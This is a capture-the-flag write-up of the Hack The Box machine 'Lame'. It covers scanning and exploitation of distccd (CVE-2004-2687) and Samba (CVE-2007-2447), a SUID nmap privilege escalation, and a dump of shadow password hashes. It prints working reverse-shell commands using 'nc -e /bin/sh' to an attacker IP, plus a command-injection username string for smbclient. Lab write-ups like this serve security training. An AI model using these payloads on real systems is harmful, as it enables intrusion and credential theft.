HTB-Lame

Box Info

Difficulty Easy
OS Linux
IP Address 10.10.10.3

Port Scanning

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
# Check all open TCP
sudo rustscan 10.10.10.3 -r 1-65535 --ulimit 5000
# Nmap scan with script on open TCP port
sudo nmap 10.10.10.3 -sCV -Pn -sT -p 21,22,139,445,3632
# Nmap scan vulnerability 
sudo nmap -sT -p 21,22,139,445,3632 --script=vuln -O -Pn 10.10.10.3
# Nmap scan with UDP port
sudo nmap -sU --top-ports 20 -Pn 10.10.10.3

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.12
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
| distcc-cve2004-2687: 
|   VULNERABLE:
|   distcc Daemon Command Execution
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2004-2687
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|       Allows executing of arbitrary commands on systems running distccd 3.1 and
|       earlier. The vulnerability is the consequence of weak service configuration.
|       
|     Disclosure date: 2002-02-01
|     Extra information:
|       
|     uid=1(daemon) gid=1(daemon) groups=1(daemon)
|   
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
|       https://distcc.github.io/security.html
|_      https://nvd.nist.gov/vuln/detail/CVE-2004-2687
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2025-06-01T08:33:23-04:00
|_clock-skew: mean: -5h39m46s, deviation: 2h49m45s, median: -7h39m48s
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Update DNS

1
2
sudo nano /etc/hosts
10.10.10.3 lame.htb

Service Enumeration

445/tcp - SMB

1
2
3
# NMAP Scanning
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)

From the nmap scanning we can see smb is running under 3.0.20 version. Upon searchsploit found a vulnerability

6274984bbd5e147ef343d718a453b74e.webp

Impacted to CVE-2007-2447

d2d376bfd456e08b434ef9b46b7680b6.webp

Check if the SMB file able to access with anonymous

1
smbclient --no-pass -L //10.10.10.3/

d46368a7b462c01b3417f536af299f37.webp

3632/tcp - DistCC

Upon nmap vulnerability scanning, found the port is vulnerable to distcc

bbc979ba7e19bc63b3bb6f37c9266b77.webp

distcc is designed to distribute compilation tasks across multiple machines to speed up the build process. However, if the distccd daemon is not properly secured, it exposes a remote code execution (RCE) vulnerability. This occurs because the daemon listens on a network port and accepts commands from any client, allowing them to execute shell commands on the server as the user running the daemon.

The vulnerability has been assigned CVE-2004-2687 and affects distccd versions prior to 3.1.

#1 Initiate User Foothold with DistCC Vulnerability

CVE-2004-2687

https://github.com/n3rdh4x0r/distccd_rce_CVE-2004-2687

Here we will use the RCE script from github to obtain the RCE.

1
2
3
4
5
6
7
8
9
git clone https://github.com/n3rdh4x0r/distccd_rce_CVE-2004-2687
cd distccd_rce_CVE-2004-2687 

# Prep python venv
python3 -m venv venv 
source venv/bin/activate

# Start listener on KALI
rlwrap nc -lvnp 9001

Exploit

1
python3 distccd_rce.py -t 10.10.10.3 -p 3632 -c "nc 10.10.xx.xx 9001 -e /bin/sh"

81a32e9a9da52168a208d5b71f441e86.webp

Upgrade FullyTTY

1
python -c 'import pty;pty.spawn("/bin/sh")'

User Flag

373d33751d2cfe7d7aa6d4cfaa341e90.webp

Privilege Escalation

SUID

1
find / -type f -user root \( -perm -4000 -o -perm -2000 \) 2>/dev/null -ls

Found that nmap is part of SUID

d5c66cd4f22c060dc0b5ffc1e171ac03.webp

Initiate Root Foothold

GTFObins

[nmap

        |
        
        GTFOBins](https://gtfobins.github.io/gtfobins/nmap/)

ecc8d0381d45d36e0e6ccda1871435d7.webp

Found that second one is working

4181a9bbdda37e8ebac5b373118abc3b.webp

Root Flag

5bcedd14dc2d955787e61de5f3336301.webp

#2 Initiate User Foothold with SMB Vulnerability

CVE-2007-2447 (Metasploit)

As we know the smb port is vulnerable to CVE-2007-2447 . We can use metasploit to automate the exploit like below

1
2
3
4
5
6
use exploit/multi/samba/usermap_script
set LHOST <kali-ip>
set LPORT 9001
set RHOST 10.10.10.3
set RPORT 139
exploit

d0ca092b98a28276b0bda823e31037ef.webp

Wait for the session enable, here we got the root user!

0a44e35b75de87c16ab46836e22c2291.webp

CVE-2007-2447 (Manually)

Here I would like to do it manually to gain understanding.

21bdbe58266ae17eae738cb8241a573c.webp

It just a short script to exploit, where def exploit

It start with a smbclient session with

  • username /=nohup [payload]``
  • password is random 16 characters
  • domain is using SMBDomain

Basically the smb vulnerability allow to execute in its username and script is using nohup with payload which start the process background. Understand the exploitation, lets work on the PoC

1
2
3
4
5
# Start Listener
rlwrap nc -lvnp 9001

# Exploit with smbclient
smbclient //10.10.10.3/opt -U './=`nohup nc -e /bin/sh 10.10.14.12 9001`'

However it showing the error of NT_STATUS_LOGON_FAILURE

f7cfdee5d728bf791479426a4a1166e1.webp

There is an alternative method, is we login to the smb session first and logon 

1
2
smbclient --no-pass //10.10.10.3/tmp
logon "./=`nohup nc -e /bin/sh 10.10.14.12 9001`"

a8e272b2bce52cb46f79227c6428bc56.webp

User flag

I had completed the user flag in #1 Initiate User Foothold with DistCC Vulnerability

We had obtained the root user, can check the user.txt file as well

Root flag

a41aa0de5cdc8ad9b6a7855242c4fc8b.webp

Shadow hash

1
2
3
4
5
6
root:$1$p/d3CvVJ$4HDjev4SJFo7VMwL2Zg6P0:17239:0:99999:7:::
sys:$1$NsRwcGHl$euHtoVjd59CxMcIasiTw/.:17239:0:99999:7:::
klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
postgres:$1$dwLrUikz$LRJRShCPfPyYb3r6pinyM.:17239:0:99999:7:::
service:$1$cwdqim5m$bw71JTFHNWLjDTmYTNN9j/:17239:0:99999:7:::
makis:$1$Yp7BAV10$7yHWur1KMMwK5b8KRZ2yK.:17239:0:99999:7:::

03338761cf162d405aef88be38d93c0f.webp